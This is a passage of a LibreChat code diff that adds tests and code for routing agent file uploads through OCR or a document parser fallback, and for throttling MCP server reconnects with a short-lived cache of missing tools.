await processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() });
|
||||||
|
|
||||||
|
expect(getStrategyFunctions).toHaveBeenCalledWith(FileSources.document_parser);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('does not check OCR capability when using automatic document_parser fallback', async () => {
|
||||||
|
const req = makeReq({ mimetype: PDF_MIME, ocrConfig: null });
|
||||||
|
|
||||||
|
await processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() });
|
||||||
|
|
||||||
|
expect(checkCapability).not.toHaveBeenCalledWith(expect.anything(), AgentCapabilities.ocr);
|
||||||
|
expect(getStrategyFunctions).toHaveBeenCalledWith(FileSources.document_parser);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('uses the configured OCR strategy when OCR is set up for the file type', async () => {
|
||||||
|
mergeFileConfig.mockReturnValue(makeFileConfig({ ocrSupportedMimeTypes: [PDF_MIME] }));
|
||||||
|
const req = makeReq({
|
||||||
|
mimetype: PDF_MIME,
|
||||||
|
ocrConfig: { strategy: FileSources.mistral_ocr },
|
||||||
|
});
|
||||||
|
|
||||||
|
await processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() });
|
||||||
|
|
||||||
|
expect(checkCapability).toHaveBeenCalledWith(expect.anything(), AgentCapabilities.ocr);
|
||||||
|
expect(getStrategyFunctions).toHaveBeenCalledWith(FileSources.mistral_ocr);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('uses document_parser as default when OCR is configured but no strategy is specified', async () => {
|
||||||
|
mergeFileConfig.mockReturnValue(makeFileConfig({ ocrSupportedMimeTypes: [PDF_MIME] }));
|
||||||
|
const req = makeReq({
|
||||||
|
mimetype: PDF_MIME,
|
||||||
|
ocrConfig: { supportedMimeTypes: [PDF_MIME] },
|
||||||
|
});
|
||||||
|
|
||||||
|
await processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() });
|
||||||
|
|
||||||
|
expect(checkCapability).toHaveBeenCalledWith(expect.anything(), AgentCapabilities.ocr);
|
||||||
|
expect(getStrategyFunctions).toHaveBeenCalledWith(FileSources.document_parser);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('throws when configured OCR capability is not enabled for the agent', async () => {
|
||||||
|
mergeFileConfig.mockReturnValue(makeFileConfig({ ocrSupportedMimeTypes: [PDF_MIME] }));
|
||||||
|
checkCapability.mockResolvedValue(false);
|
||||||
|
const req = makeReq({
|
||||||
|
mimetype: PDF_MIME,
|
||||||
|
ocrConfig: { strategy: FileSources.mistral_ocr },
|
||||||
|
});
|
||||||
|
|
||||||
|
await expect(
|
||||||
|
processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() }),
|
||||||
|
).rejects.toThrow('OCR capability is not enabled for Agents');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('uses document_parser (no capability check) when OCR capability returns false but no OCR config', async () => {
|
||||||
|
checkCapability.mockResolvedValue(false);
|
||||||
|
const req = makeReq({ mimetype: PDF_MIME, ocrConfig: null });
|
||||||
|
|
||||||
|
await processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() });
|
||||||
|
|
||||||
|
expect(checkCapability).not.toHaveBeenCalledWith(expect.anything(), AgentCapabilities.ocr);
|
||||||
|
expect(getStrategyFunctions).toHaveBeenCalledWith(FileSources.document_parser);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('uses document_parser when OCR is configured but the file type is not in OCR supported types', async () => {
|
||||||
|
mergeFileConfig.mockReturnValue(makeFileConfig({ ocrSupportedMimeTypes: [PDF_MIME] }));
|
||||||
|
const req = makeReq({
|
||||||
|
mimetype: DOCX_MIME,
|
||||||
|
ocrConfig: { strategy: FileSources.mistral_ocr },
|
||||||
|
});
|
||||||
|
|
||||||
|
await processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() });
|
||||||
|
|
||||||
|
expect(checkCapability).not.toHaveBeenCalledWith(expect.anything(), AgentCapabilities.ocr);
|
||||||
|
expect(getStrategyFunctions).toHaveBeenCalledWith(FileSources.document_parser);
|
||||||
|
expect(getStrategyFunctions).not.toHaveBeenCalledWith(FileSources.mistral_ocr);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('does not invoke any OCR strategy for unsupported MIME types without OCR config', async () => {
|
||||||
|
const req = makeReq({ mimetype: 'text/plain', ocrConfig: null });
|
||||||
|
|
||||||
|
await expect(
|
||||||
|
processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() }),
|
||||||
|
).rejects.toThrow('File type text/plain is not supported for text parsing.');
|
||||||
|
|
||||||
|
expect(getStrategyFunctions).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test.each([
|
||||||
|
['ODT', ODT_MIME],
|
||||||
|
['ODP', ODP_MIME],
|
||||||
|
['ODG', ODG_MIME],
|
||||||
|
])('routes %s through configured OCR when OCR supports the type', async (_, mime) => {
|
||||||
|
mergeFileConfig.mockReturnValue(makeFileConfig({ ocrSupportedMimeTypes: [mime] }));
|
||||||
|
const req = makeReq({
|
||||||
|
mimetype: mime,
|
||||||
|
ocrConfig: { strategy: FileSources.mistral_ocr },
|
||||||
|
});
|
||||||
|
|
||||||
|
await processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() });
|
||||||
|
|
||||||
|
expect(checkCapability).toHaveBeenCalledWith(expect.anything(), AgentCapabilities.ocr);
|
||||||
|
expect(getStrategyFunctions).toHaveBeenCalledWith(FileSources.mistral_ocr);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('throws instead of falling back to parseText when document_parser fails for a document MIME type', async () => {
|
||||||
|
getStrategyFunctions.mockReturnValue({
|
||||||
|
handleFileUpload: jest.fn().mockRejectedValue(new Error('No text found in document')),
|
||||||
|
});
|
||||||
|
const req = makeReq({ mimetype: PDF_MIME, ocrConfig: null });
|
||||||
|
const { parseText } = require('@librechat/api');
|
||||||
|
|
||||||
|
await expect(
|
||||||
|
processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() }),
|
||||||
|
).rejects.toThrow(/image-based and requires an OCR service/);
|
||||||
|
|
||||||
|
expect(parseText).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('falls back to document_parser when configured OCR fails for a document MIME type', async () => {
|
||||||
|
mergeFileConfig.mockReturnValue(makeFileConfig({ ocrSupportedMimeTypes: [PDF_MIME] }));
|
||||||
|
const failingUpload = jest.fn().mockRejectedValue(new Error('OCR API returned 500'));
|
||||||
|
const fallbackUpload = jest
|
||||||
|
.fn()
|
||||||
|
.mockResolvedValue({ text: 'parsed text', bytes: 11, filepath: 'doc://result' });
|
||||||
|
getStrategyFunctions
|
||||||
|
.mockReturnValueOnce({ handleFileUpload: failingUpload })
|
||||||
|
.mockReturnValueOnce({ handleFileUpload: fallbackUpload });
|
||||||
|
const req = makeReq({
|
||||||
|
mimetype: PDF_MIME,
|
||||||
|
ocrConfig: { strategy: FileSources.mistral_ocr },
|
||||||
|
});
|
||||||
|
|
||||||
|
await expect(
|
||||||
|
processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() }),
|
||||||
|
).resolves.not.toThrow();
|
||||||
|
|
||||||
|
expect(getStrategyFunctions).toHaveBeenCalledWith(FileSources.mistral_ocr);
|
||||||
|
expect(getStrategyFunctions).toHaveBeenCalledWith(FileSources.document_parser);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('throws when both configured OCR and document_parser fallback fail', async () => {
|
||||||
|
mergeFileConfig.mockReturnValue(makeFileConfig({ ocrSupportedMimeTypes: [PDF_MIME] }));
|
||||||
|
getStrategyFunctions.mockReturnValue({
|
||||||
|
handleFileUpload: jest.fn().mockRejectedValue(new Error('failure')),
|
||||||
|
});
|
||||||
|
const req = makeReq({
|
||||||
|
mimetype: PDF_MIME,
|
||||||
|
ocrConfig: { strategy: FileSources.mistral_ocr },
|
||||||
|
});
|
||||||
|
const { parseText } = require('@librechat/api');
|
||||||
|
|
||||||
|
await expect(
|
||||||
|
processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() }),
|
||||||
|
).rejects.toThrow(/image-based and requires an OCR service/);
|
||||||
|
|
||||||
|
expect(parseText).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('text size guard', () => {
|
||||||
|
test('throws before writing to MongoDB when extracted text exceeds 15MB', async () => {
|
||||||
|
const oversizedText = 'x'.repeat(15 * 1024 * 1024 + 1);
|
||||||
|
getStrategyFunctions.mockReturnValue({
|
||||||
|
handleFileUpload: jest.fn().mockResolvedValue({
|
||||||
|
text: oversizedText,
|
||||||
|
bytes: Buffer.byteLength(oversizedText, 'utf8'),
|
||||||
|
filepath: 'doc://result',
|
||||||
|
}),
|
||||||
|
});
|
||||||
|
const req = makeReq({ mimetype: PDF_MIME, ocrConfig: null });
|
||||||
|
const { createFile } = require('~/models');
|
||||||
|
|
||||||
|
await expect(
|
||||||
|
processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() }),
|
||||||
|
).rejects.toThrow(/exceeds the 15MB storage limit/);
|
||||||
|
|
||||||
|
expect(createFile).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('succeeds when extracted text is within the 15MB limit', async () => {
|
||||||
|
const okText = 'x'.repeat(1024);
|
||||||
|
getStrategyFunctions.mockReturnValue({
|
||||||
|
handleFileUpload: jest.fn().mockResolvedValue({
|
||||||
|
text: okText,
|
||||||
|
bytes: Buffer.byteLength(okText, 'utf8'),
|
||||||
|
filepath: 'doc://result',
|
||||||
|
}),
|
||||||
|
});
|
||||||
|
const req = makeReq({ mimetype: PDF_MIME, ocrConfig: null });
|
||||||
|
|
||||||
|
await expect(
|
||||||
|
processAgentFileUpload({ req, res: mockRes, metadata: makeMetadata() }),
|
||||||
|
).resolves.not.toThrow();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -1,5 +1,6 @@
|
||||||
const { FileSources } = require('librechat-data-provider');
|
const { FileSources } = require('librechat-data-provider');
|
||||||
const {
|
const {
|
||||||
|
parseDocument,
|
||||||
uploadMistralOCR,
|
uploadMistralOCR,
|
||||||
uploadAzureMistralOCR,
|
uploadAzureMistralOCR,
|
||||||
uploadGoogleVertexMistralOCR,
|
uploadGoogleVertexMistralOCR,
|
||||||
|
|
@ -246,6 +247,26 @@ const vertexMistralOCRStrategy = () => ({
|
||||||
handleFileUpload: uploadGoogleVertexMistralOCR,
|
handleFileUpload: uploadGoogleVertexMistralOCR,
|
||||||
});
|
});
|
||||||
|
|
||||||
|
const documentParserStrategy = () => ({
|
||||||
|
/** @type {typeof saveFileFromURL | null} */
|
||||||
|
saveURL: null,
|
||||||
|
/** @type {typeof getLocalFileURL | null} */
|
||||||
|
getFileURL: null,
|
||||||
|
/** @type {typeof saveLocalBuffer | null} */
|
||||||
|
saveBuffer: null,
|
||||||
|
/** @type {typeof processLocalAvatar | null} */
|
||||||
|
processAvatar: null,
|
||||||
|
/** @type {typeof uploadLocalImage | null} */
|
||||||
|
handleImageUpload: null,
|
||||||
|
/** @type {typeof prepareImagesLocal | null} */
|
||||||
|
prepareImagePayload: null,
|
||||||
|
/** @type {typeof deleteLocalFile | null} */
|
||||||
|
deleteFile: null,
|
||||||
|
/** @type {typeof getLocalFileStream | null} */
|
||||||
|
getDownloadStream: null,
|
||||||
|
handleFileUpload: parseDocument,
|
||||||
|
});
|
||||||
|
|
||||||
// Strategy Selector
|
// Strategy Selector
|
||||||
const getStrategyFunctions = (fileSource) => {
|
const getStrategyFunctions = (fileSource) => {
|
||||||
if (fileSource === FileSources.firebase) {
|
if (fileSource === FileSources.firebase) {
|
||||||
|
|
@ -270,6 +291,8 @@ const getStrategyFunctions = (fileSource) => {
|
||||||
return azureMistralOCRStrategy();
|
return azureMistralOCRStrategy();
|
||||||
} else if (fileSource === FileSources.vertexai_mistral_ocr) {
|
} else if (fileSource === FileSources.vertexai_mistral_ocr) {
|
||||||
return vertexMistralOCRStrategy();
|
return vertexMistralOCRStrategy();
|
||||||
|
} else if (fileSource === FileSources.document_parser) {
|
||||||
|
return documentParserStrategy();
|
||||||
} else if (fileSource === FileSources.text) {
|
} else if (fileSource === FileSources.text) {
|
||||||
return localStrategy(); // Text files use local strategy
|
return localStrategy(); // Text files use local strategy
|
||||||
} else {
|
} else {
|
||||||
|
|
|
||||||
|
|
@ -7,7 +7,7 @@ const getLogStores = require('~/cache/getLogStores');
|
||||||
/**
|
/**
|
||||||
* Get Microsoft Graph API token using existing token exchange mechanism
|
* Get Microsoft Graph API token using existing token exchange mechanism
|
||||||
* @param {Object} user - User object with OpenID information
|
* @param {Object} user - User object with OpenID information
|
||||||
* @param {string} accessToken - Current access token from Authorization header
|
* @param {string} accessToken - Federated access token used as OBO assertion
|
||||||
* @param {string} scopes - Graph API scopes for the token
|
* @param {string} scopes - Graph API scopes for the token
|
||||||
* @param {boolean} fromCache - Whether to try getting token from cache first
|
* @param {boolean} fromCache - Whether to try getting token from cache first
|
||||||
* @returns {Promise<Object>} Graph API token response with access_token and expires_in
|
* @returns {Promise<Object>} Graph API token response with access_token and expires_in
|
||||||
|
|
|
||||||
|
|
@ -34,6 +34,55 @@ const { reinitMCPServer } = require('./Tools/mcp');
|
||||||
const { getAppConfig } = require('./Config');
|
const { getAppConfig } = require('./Config');
|
||||||
const { getLogStores } = require('~/cache');
|
const { getLogStores } = require('~/cache');
|
||||||
|
|
||||||
|
const MAX_CACHE_SIZE = 1000;
|
||||||
|
const lastReconnectAttempts = new Map();
|
||||||
|
const RECONNECT_THROTTLE_MS = 10_000;
|
||||||
|
|
||||||
|
const missingToolCache = new Map();
|
||||||
|
const MISSING_TOOL_TTL_MS = 10_000;
|
||||||
|
|
||||||
|
function evictStale(map, ttl) {
|
||||||
|
if (map.size <= MAX_CACHE_SIZE) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
const now = Date.now();
|
||||||
|
for (const [key, timestamp] of map) {
|
||||||
|
if (now - timestamp >= ttl) {
|
||||||
|
map.delete(key);
|
||||||
|
}
|
||||||
|
if (map.size <= MAX_CACHE_SIZE) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
const unavailableMsg =
|
||||||
|
"This tool's MCP server is temporarily unavailable. Please try again shortly.";
|
||||||
|
|
||||||
|
/**
|
||||||
|
* @param {string} toolName
|
||||||
|
* @param {string} serverName
|
||||||
|
*/
|
||||||
|
function createUnavailableToolStub(toolName, serverName) {
|
||||||
|
const normalizedToolKey = `${toolName}${Constants.mcp_delimiter}${normalizeServerName(serverName)}`;
|
||||||
|
const _call = async () => [unavailableMsg, null];
|
||||||
|
const toolInstance = tool(_call, {
|
||||||
|
schema: {
|
||||||
|
type: 'object',
|
||||||
|
properties: {
|
||||||
|
input: { type: 'string', description: 'Input for the tool' },
|
||||||
|
},
|
||||||
|
required: [],
|
||||||
|
},
|
||||||
|
name: normalizedToolKey,
|
||||||
|
description: unavailableMsg,
|
||||||
|
responseFormat: AgentConstants.CONTENT_AND_ARTIFACT,
|
||||||
|
});
|
||||||
|
toolInstance.mcp = true;
|
||||||
|
toolInstance.mcpRawServerName = serverName;
|
||||||
|
return toolInstance;
|
||||||
|
}
|
||||||
|
|
||||||
function isEmptyObjectSchema(jsonSchema) {
|
function isEmptyObjectSchema(jsonSchema) {
|
||||||
return (
|
return (
|
||||||
jsonSchema != null &&
|
jsonSchema != null &&
|
||||||
|
|
@ -211,6 +260,17 @@ async function reconnectServer({
|
||||||
logger.debug(
|
logger.debug(
|
||||||
`[MCP][reconnectServer] serverName: ${serverName}, user: ${user?.id}, hasUserMCPAuthMap: ${!!userMCPAuthMap}`,
|
`[MCP][reconnectServer] serverName: ${serverName}, user: ${user?.id}, hasUserMCPAuthMap: ${!!userMCPAuthMap}`,
|
||||||
);
|
);
|
||||||
|
|
||||||
|
const throttleKey = `${user.id}:${serverName}`;
|
||||||
|
const now = Date.now();
|
||||||
|
const lastAttempt = lastReconnectAttempts.get(throttleKey) ?? 0;
|
||||||
|
if (now - lastAttempt < RECONNECT_THROTTLE_MS) {
|
||||||
|
logger.debug(`[MCP][reconnectServer] Throttled reconnect for ${serverName}`);
|
||||||
|
return null;
|
||||||
|
}
|
||||||
|
lastReconnectAttempts.set(throttleKey, now);
|
||||||
|
evictStale(lastReconnectAttempts, RECONNECT_THROTTLE_MS);
|
||||||
|
|
||||||
const runId = Constants.USE_PRELIM_RESPONSE_MESSAGE_ID;
|
const runId = Constants.USE_PRELIM_RESPONSE_MESSAGE_ID;
|
||||||
const flowId = `${user.id}:${serverName}:${Date.now()}`;
|
const flowId = `${user.id}:${serverName}:${Date.now()}`;
|
||||||
const flowManager = getFlowStateManager(getLogStores(CacheKeys.FLOWS));
|
const flowManager = getFlowStateManager(getLogStores(CacheKeys.FLOWS));
|
||||||
|
|
@ -267,7 +327,7 @@ async function reconnectServer({
|
||||||
userMCPAuthMap,
|
userMCPAuthMap,
|
||||||
forceNew: true,
|
forceNew: true,
|
||||||
returnOnOAuth: false,
|
returnOnOAuth: false,
|
||||||
connectionTimeout: Time.TWO_MINUTES,
|
connectionTimeout: Time.THIRTY_SECONDS,
|
||||||
});
|
});
|
||||||
} finally {
|
} finally {
|
||||||
// Clean up abort handler to prevent memory leaks
|
// Clean up abort handler to prevent memory leaks
|
||||||
|
|
@ -330,9 +390,13 @@ async function createMCPTools({
|
||||||
userMCPAuthMap,
|
userMCPAuthMap,
|
||||||
streamId,
|
streamId,
|
||||||
});
|
});
|
||||||
|
if (result === null) {
|
||||||
|
logger.debug(`[MCP][${serverName}] Reconnect throttled, skipping tool creation.`);
|
||||||
|
return [];
|
||||||
|
}
|
||||||
if (!result || !result.tools) {
|
if (!result || !result.tools) {
|
||||||
logger.warn(`[MCP][${serverName}] Failed to reinitialize MCP server.`);
|
logger.warn(`[MCP][${serverName}] Failed to reinitialize MCP server.`);
|
||||||
return;
|
return [];
|
||||||
}
|
}
|
||||||
|
|
||||||
const serverTools = [];
|
const serverTools = [];
|
||||||
|
|
@ -402,6 +466,14 @@ async function createMCPTool({
|
||||||
/** @type {LCTool | undefined} */
|
/** @type {LCTool | undefined} */
|
||||||
let toolDefinition = availableTools?.[toolKey]?.function;
|
let toolDefinition = availableTools?.[toolKey]?.function;
|
||||||
if (!toolDefinition) {
|
if (!toolDefinition) {
|
||||||
|
const cachedAt = missingToolCache.get(toolKey);
|
||||||
|
if (cachedAt && Date.now() - cachedAt < MISSING_TOOL_TTL_MS) {
|
||||||
|
logger.debug(
|
||||||
|
`[MCP][${serverName}][${toolName}] Tool in negative cache, returning unavailable stub.`,
|
||||||
|
);
|
||||||
|
return createUnavailableToolStub(toolName, serverName);
|
||||||
|
}
|
||||||
|
|
||||||
logger.warn(
|
logger.warn(
|
||||||
`[MCP][${serverName}][${toolName}] Requested tool not found in available tools, re-initializing MCP server.`,
|
`[MCP][${serverName}][${toolName}] Requested tool not found in available tools, re-initializing MCP server.`,
|
||||||
);
|
);
|
||||||
|
|
@ -415,11 +487,18 @@ async function createMCPTool({
|
||||||
streamId,
|
streamId,
|
||||||
});
|
});
|
||||||
toolDefinition = result?.availableTools?.[toolKey]?.function;
|
toolDefinition = result?.availableTools?.[toolKey]?.function;
|
||||||
|
|
||||||
|
if (!toolDefinition) {
|
||||||
|
missingToolCache.set(toolKey, Date.now());
|
||||||
|
evictStale(missingToolCache, MISSING_TOOL_TTL_MS);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
if (!toolDefinition) {
|
if (!toolDefinition) {
|
||||||
logger.warn(`[MCP][${serverName}][${toolName}] Tool definition not found, cannot create tool.`);
|
logger.warn(
|
||||||
return;
|
`[MCP][${serverName}][${toolName}] Tool definition not found, returning unavailable stub.`,
|
||||||
|
);
|
||||||
|
return createUnavailableToolStub(toolName, serverName);
|
||||||
}
|
}
|
||||||
|
|
||||||
return createToolInstance({
|
return createToolInstance({
|
||||||
|
|
@ -720,4 +799,5 @@ module.exports = {
|
||||||
getMCPSetupData,
|
getMCPSetupData,
|
||||||
checkOAuthFlowStatus,
|
checkOAuthFlowStatus,
|
||||||
getServerConnectionStatus,
|
getServerConnectionStatus,
|
||||||
|
createUnavailableToolStub,
|
||||||
};
|
};
|
||||||
|
|
|
||||||
|
|
@ -45,6 +45,7 @@ const {
|
||||||
getMCPSetupData,
|
getMCPSetupData,
|
||||||
checkOAuthFlowStatus,
|
checkOAuthFlowStatus,
|
||||||
getServerConnectionStatus,
|
getServerConnectionStatus,
|
||||||
|
createUnavailableToolStub,
|
||||||
} = require('./MCP');
|
} = require('./MCP');
|
||||||
|
|
||||||
jest.mock('./Config', () => ({
|
jest.mock('./Config', () => ({
|
||||||
|
|
@ -1098,6 +1099,188 @@ describe('User parameter passing tests', () => {
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
|
describe('createUnavailableToolStub', () => {
|
||||||
|
it('should return a tool whose _call returns a valid CONTENT_AND_ARTIFACT two-tuple', async () => {
|
||||||
|
const stub = createUnavailableToolStub('myTool', 'myServer');
|
||||||
|
// invoke() goes through langchain's base tool, which checks responseFormat.
|
||||||
|
// CONTENT_AND_ARTIFACT requires [content, artifact] — a bare string would throw:
|
||||||
|
// "Tool response format is "content_and_artifact" but the output was not a two-tuple"
|
||||||
|
const result = await stub.invoke({});
|
||||||
|
// If we reach here without throwing, the two-tuple format is correct.
|
||||||
|
// invoke() returns the content portion of [content, artifact] as a string.
|
||||||
|
expect(result).toContain('temporarily unavailable');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('negative tool cache and throttle interaction', () => {
|
||||||
|
it('should cache tool as missing even when throttled (cross-user dedup)', async () => {
|
||||||
|
const mockUser = { id: 'throttle-test-user' };
|
||||||
|
const mockRes = { write: jest.fn(), flush: jest.fn() };
|
||||||
|
|
||||||
|
// First call: reconnect succeeds but tool not found
|
||||||
|
mockReinitMCPServer.mockResolvedValueOnce({
|
||||||
|
availableTools: {},
|
||||||
|
});
|
||||||
|
|
||||||
|
await createMCPTool({
|
||||||
|
res: mockRes,
|
||||||
|
user: mockUser,
|
||||||
|
toolKey: `missing-tool${D}cache-dedup-server`,
|
||||||
|
provider: 'openai',
|
||||||
|
userMCPAuthMap: {},
|
||||||
|
availableTools: undefined,
|
||||||
|
});
|
||||||
|
|
||||||
|
// Second call within 10s for DIFFERENT tool on same server:
|
||||||
|
// reconnect is throttled (returns null), tool is still cached as missing.
|
||||||
|
// This is intentional: the cache acts as cross-user dedup since the
|
||||||
|
// throttle is per-user-per-server and can't prevent N different users
|
||||||
|
// from each triggering their own reconnect.
|
||||||
|
const result2 = await createMCPTool({
|
||||||
|
res: mockRes,
|
||||||
|
user: mockUser,
|
||||||
|
toolKey: `other-tool${D}cache-dedup-server`,
|
||||||
|
provider: 'openai',
|
||||||
|
userMCPAuthMap: {},
|
||||||
|
availableTools: undefined,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result2).toBeDefined();
|
||||||
|
expect(result2.name).toContain('other-tool');
|
||||||
|
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should prevent user B from triggering reconnect when user A already cached the tool', async () => {
|
||||||
|
const userA = { id: 'cache-user-A' };
|
||||||
|
const userB = { id: 'cache-user-B' };
|
||||||
|
const mockRes = { write: jest.fn(), flush: jest.fn() };
|
||||||
|
|
||||||
|
// User A: real reconnect, tool not found → cached
|
||||||
|
mockReinitMCPServer.mockResolvedValueOnce({
|
||||||
|
availableTools: {},
|
||||||
|
});
|
||||||
|
|
||||||
|
await createMCPTool({
|
||||||
|
res: mockRes,
|
||||||
|
user: userA,
|
||||||
|
toolKey: `shared-tool${D}cross-user-server`,
|
||||||
|
provider: 'openai',
|
||||||
|
userMCPAuthMap: {},
|
||||||
|
availableTools: undefined,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
|
||||||
|
|
||||||
|
// User B requests the SAME tool within 10s.
|
||||||
|
// The negative cache is keyed by toolKey (no user prefix), so user B
|
||||||
|
// gets a cache hit and no reconnect fires. This is the cross-user
|
||||||
|
// storm protection: without this, user B's unthrottled first request
|
||||||
|
// would trigger a second reconnect to the same server.
|
||||||
|
const result = await createMCPTool({
|
||||||
|
res: mockRes,
|
||||||
|
user: userB,
|
||||||
|
toolKey: `shared-tool${D}cross-user-server`,
|
||||||
|
provider: 'openai',
|
||||||
|
userMCPAuthMap: {},
|
||||||
|
availableTools: undefined,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toBeDefined();
|
||||||
|
expect(result.name).toContain('shared-tool');
|
||||||
|
// reinitMCPServer still called only once — user B hit the cache
|
||||||
|
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should prevent user B from triggering reconnect for throttle-cached tools', async () => {
|
||||||
|
const userA = { id: 'storm-user-A' };
|
||||||
|
const userB = { id: 'storm-user-B' };
|
||||||
|
const mockRes = { write: jest.fn(), flush: jest.fn() };
|
||||||
|
|
||||||
|
// User A: real reconnect for tool-1, tool not found → cached
|
||||||
|
mockReinitMCPServer.mockResolvedValueOnce({
|
||||||
|
availableTools: {},
|
||||||
|
});
|
||||||
|
|
||||||
|
await createMCPTool({
|
||||||
|
res: mockRes,
|
||||||
|
user: userA,
|
||||||
|
toolKey: `tool-1${D}storm-server`,
|
||||||
|
provider: 'openai',
|
||||||
|
userMCPAuthMap: {},
|
||||||
|
availableTools: undefined,
|
||||||
|
});
|
||||||
|
|
||||||
|
// User A: tool-2 on same server within 10s → throttled → cached from throttle
|
||||||
|
await createMCPTool({
|
||||||
|
res: mockRes,
|
||||||
|
user: userA,
|
||||||
|
toolKey: `tool-2${D}storm-server`,
|
||||||
|
provider: 'openai',
|
||||||
|
userMCPAuthMap: {},
|
||||||
|
availableTools: undefined,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
|
||||||
|
|
||||||
|
// User B requests tool-2 — gets cache hit from the throttle-cached entry.
|
||||||
|
// Without this caching, user B would trigger a real reconnect since
|
||||||
|
// user B has their own throttle key and hasn't reconnected yet.
|
||||||
|
const result = await createMCPTool({
|
||||||
|
res: mockRes,
|
||||||
|
user: userB,
|
||||||
|
toolKey: `tool-2${D}storm-server`,
|
||||||
|
provider: 'openai',
|
||||||
|
userMCPAuthMap: {},
|
||||||
|
availableTools: undefined,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toBeDefined();
|
||||||
|
expect(result.name).toContain('tool-2');
|
||||||
|
// Still only 1 real reconnect — user B was protected by the cache
|
||||||
|
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('createMCPTools throttle handling', () => {
|
||||||
|
it('should return empty array with debug log when reconnect is throttled', async () => {
|
||||||
|
const mockUser = { id: 'throttle-tools-user' };
|
||||||
|
const mockRes = { write: jest.fn(), flush: jest.fn() };
|
||||||
|
|
||||||
|
// First call: real reconnect
|
||||||
|
mockReinitMCPServer.mockResolvedValueOnce({
|
||||||
|
tools: [{ name: 'tool1' }],
|
||||||
|
availableTools: {
|
||||||
|
[`tool1${D}throttle-tools-server`]: {
|
||||||
|
function: { description: 'Tool 1', parameters: {} },
|
||||||
|
},
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
await createMCPTools({
|
||||||
|
res: mockRes,
|
||||||
|
user: mockUser,
|
||||||
|
serverName: 'throttle-tools-server',
|
||||||
|
provider: 'openai',
|
||||||
|
userMCPAuthMap: {},
|
||||||
|
});
|
||||||
|
|
||||||
|
// Second call within 10s — throttled
|
||||||
|
const result = await createMCPTools({
|
||||||
|
res: mockRes,
|
||||||
|
user: mockUser,
|
||||||
|
serverName: 'throttle-tools-server',
|
||||||
|
provider: 'openai',
|
||||||
|
userMCPAuthMap: {},
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([]);
|
||||||
|
// reinitMCPServer called only once — second was throttled
|
||||||
|
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
|
||||||
|
// Should log at debug level (not warn) for throttled case
|
||||||
|
expect(logger.debug).toHaveBeenCalledWith(expect.stringContaining('Reconnect throttled'));
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
describe('User parameter integrity', () => {
|
describe('User parameter integrity', () => {
|
||||||
it('should preserve user object properties through the call chain', async () => {
|
it('should preserve user object properties through the call chain', async () => {
|
||||||
const complexUser = {
|
const complexUser = {
|
||||||
|
|
|
||||||
|
|
@ -12,7 +12,6 @@ const {
|
||||||
const {
|
const {
|
||||||
sendEvent,
|
sendEvent,
|
||||||
getToolkitKey,
|
getToolkitKey,
|
||||||
hasCustomUserVars,
|
|
||||||
getUserMCPAuthMap,
|
getUserMCPAuthMap,
|
||||||
loadToolDefinitions,
|
loadToolDefinitions,
|
||||||
GenerationJobManager,
|
GenerationJobManager,
|
||||||
|
|
@ -65,6 +64,26 @@ const { redactMessage } = require('~/config/parsers');
|
||||||
const { findPluginAuthsByKeys } = require('~/models');
|
const { findPluginAuthsByKeys } = require('~/models');
|
||||||
const { getFlowStateManager } = require('~/config');
|
const { getFlowStateManager } = require('~/config');
|
||||||
const { getLogStores } = require('~/cache');
|
const { getLogStores } = require('~/cache');
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Resolves the set of enabled agent capabilities from endpoints config,
|
||||||
|
* falling back to app-level or default capabilities for ephemeral agents.
|
||||||
|
* @param {ServerRequest} req
|
||||||
|
* @param {Object} appConfig
|
||||||
|
* @param {string} agentId
|
||||||
|
